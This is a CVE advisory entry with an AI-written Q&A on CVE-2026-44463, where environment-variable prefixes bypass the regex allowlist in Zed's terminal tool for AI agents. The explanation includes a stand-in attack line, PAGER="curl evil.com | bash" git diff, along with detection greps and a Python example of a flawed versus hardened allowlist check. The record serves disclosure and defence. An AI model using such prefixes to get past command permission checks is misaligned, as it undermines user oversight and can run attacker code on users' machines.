CVE-2026-44463
Status: Received - Intake
Zed Code Editor Terminal Permission Bypass via Environment Variables

Publication date: 2026-05-28

Last updated on: 2026-05-28

Assigner: GitHub, Inc.

Description
Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed by prepending environment variable assignments to allowlisted commands, hijacking program behavior (e.g., PAGER) to execute arbitrary code. This vulnerability is fixed in 0.229.0.
Meta Information
Generated: 2026-05-28
AI Q&A: 2026-05-28
EPSS Evaluated: N/A
Affected Vendors & Products
Vendor: zed
Product: zed
Version / Range: up to 0.229.0 (exclusive)
CWE
CWE-184 The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-44463 is a vulnerability in Zed's terminal tool permission system that allows an attacker to bypass allowlist restrictions by injecting environment variables into commands.

The issue arises because Zed's regex-based allowlist does not account for environment variable prefixes (e.g., VAR=value cmd), a form that POSIX shells such as Bash accept and that CLI utilities such as git then honor.

By prepending environment variable assignments to allowlisted commands, an attacker can manipulate the behavior of tools that respect user-controlled environment variables (e.g., PAGER, EDITOR, or GIT_SSH_COMMAND).

For example, a command like PAGER=curl git diff would execute curl as the pager instead of the default, potentially leading to arbitrary code execution if the attacker controls the environment variable value (e.g., PAGER="curl evil.com | bash" git diff).

This affects tools like git, less, and man, creating a broad attack surface.

How can this vulnerability impact me?

This vulnerability can lead to arbitrary code execution by allowing attackers to bypass permission restrictions and hijack program behavior through environment variable manipulation.

The impacts include high confidentiality, integrity, and availability loss, meaning sensitive data could be exposed or altered, and system availability could be compromised.

Because it affects common tools like git, less, and man, the attack surface is broad, increasing the risk of exploitation.

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by checking if environment variable assignments are being prepended to allowlisted commands in Zed's terminal tool usage. Specifically, look for commands where environment variables like PAGER, EDITOR, or GIT_SSH_COMMAND are set inline before allowlisted commands such as git, less, or man.

You can inspect running processes or command histories for suspicious patterns like:

  • grep -E '^[A-Za-z_][A-Za-z0-9_]*=.* (git|less|man)( |$)' ~/.bash_history
  • ps -eo args= | grep -E '^[A-Za-z_][A-Za-z0-9_]*=.* (git|less|man)( |$)'
  • Check environment variables used in commands by reviewing scripts or tool invocations that might prepend environment variables to allowlisted commands.
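The regex-versus-structure distinction explained above, together with the detection step, as an added example that is not part of this record or of Zed's own code; the allowlist, the flawed regex and the history lines are constructed for illustration:

```python
import re
import shlex

ALLOWLIST = {"git", "less", "man"}  # constructed sample policy
# A shell treats a leading NAME=value word as an environment assignment
# scoped to the program that follows it.
ASSIGNMENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*=")

def split_prefix(command):
    """Split into (leading NAME=value assignments, program words); None if the
    line has unbalanced quotes. Quoted assignments are also reported (safe)."""
    try:
        words = shlex.split(command)
    except ValueError:
        return None
    i = 0
    while i < len(words) and ASSIGNMENT.match(words[i]):
        i += 1
    return words[:i], words[i:]

def naive_allows(command):
    # Flawed check in the spirit of the bug: only asks whether an
    # allowlisted program name appears somewhere as a word.
    return re.search(r"\b(git|less|man)\b", command) is not None

def hardened_allows(command):
    # Structural check: the first word must itself be an allowlisted program,
    # so a leading NAME=value assignment is refused. Covers the env-prefix
    # case only; shell operators such as pipes and ';' need their own handling.
    parsed = split_prefix(command)
    if parsed is None:
        return False
    assignments, program = parsed
    return not assignments and bool(program) and program[0] in ALLOWLIST

def find_env_prefixed(history):
    # Detection over shell-history lines: lines where one or more
    # assignments precede an allowlisted program.
    hits = []
    for line in history.splitlines():
        parsed = split_prefix(line)
        if parsed and parsed[0] and parsed[1] and parsed[1][0] in ALLOWLIST:
            hits.append(line)
    return hits

# Constructed sample history with benign stand-in values.
SAMPLE_HISTORY = """git status
PAGER=cat git log -3
FOO=bar echo hi
GIT_SSH_COMMAND='ssh -v' git fetch"""
```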

What immediate steps should I take to mitigate this vulnerability?

The immediate step to mitigate this vulnerability is to upgrade Zed to version 0.229.0 or later, where the issue has been fixed.

Additionally, avoid allowing untrusted users or AI agents to influence environment variables that are prepended to allowlisted commands, as this can lead to arbitrary code execution.

Review and restrict the use of environment variable assignments in command invocations within your systems and scripts.
